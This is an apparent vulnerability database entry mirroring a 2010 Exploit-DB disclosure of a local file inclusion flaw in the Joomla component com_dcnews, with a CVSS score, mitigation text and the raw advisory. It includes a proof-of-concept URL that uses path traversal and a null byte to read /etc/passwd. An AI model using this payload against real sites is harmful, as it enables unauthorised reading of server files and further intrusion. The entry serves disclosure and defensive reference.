Joomla Component com_dcnews LFI Vulnerability

vendor:

Joomla Component com_dcnews

by:

Th3 RDX

5.5

CVSS

MEDIUM

Local File Inclusion

CWE

Product Name: Joomla Component com_dcnews

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Online Sites

2010

Joomla Component com_dcnews LFI Vulnerability

The Joomla component com_dcnews is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability to include local files on the server.

Mitigation:

Apply the latest patches and updates for the Joomla component com_dcnews.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Joomla Component com_dcnews LFI Vulnerability
# Date: 6-11-2010
# Author: Th3 RDX
# Software Link: n/a
# Version: n/a
# Tested on: online Sites
# category: webapp/Joomla
# Code : n/a
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Br0wn Sug4r, Sid3^effects, L0rd CruSad3r,
Sonic , r0073r(inj3ct0r.com)                  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, G00g!3 W@rr!0r, 
str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                           ......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

        Th3 RDX

----- [ E - mail ] -----

    th3rdx@gmail.com


                                                        %\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Joomla Component com_dcnews LFI Vulnerability

----- [ Vendor ] -----
n/a
                                                        %\\
##############################################################################

##############################################################################
%//

----- [ Bug (s) ] -----

----- [ Local File Inclusion ] -----

=> [ EXPLOIT ]

http://server/index.php?option=com_dcnews&view=dcnews&controller=[LFI]

=> [ Example/POC ]

http://server/index.php?option=com_dcnews&view=dcnews&controller=../../../../../../../../../../etc/passwd%00

                                                    %\\
##############################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam 
 
=> c0d3 for motherland, h4ck for motherland
 
==> i'm worst than a useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.

Bug discovered : 06 November 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 

#End 0Day#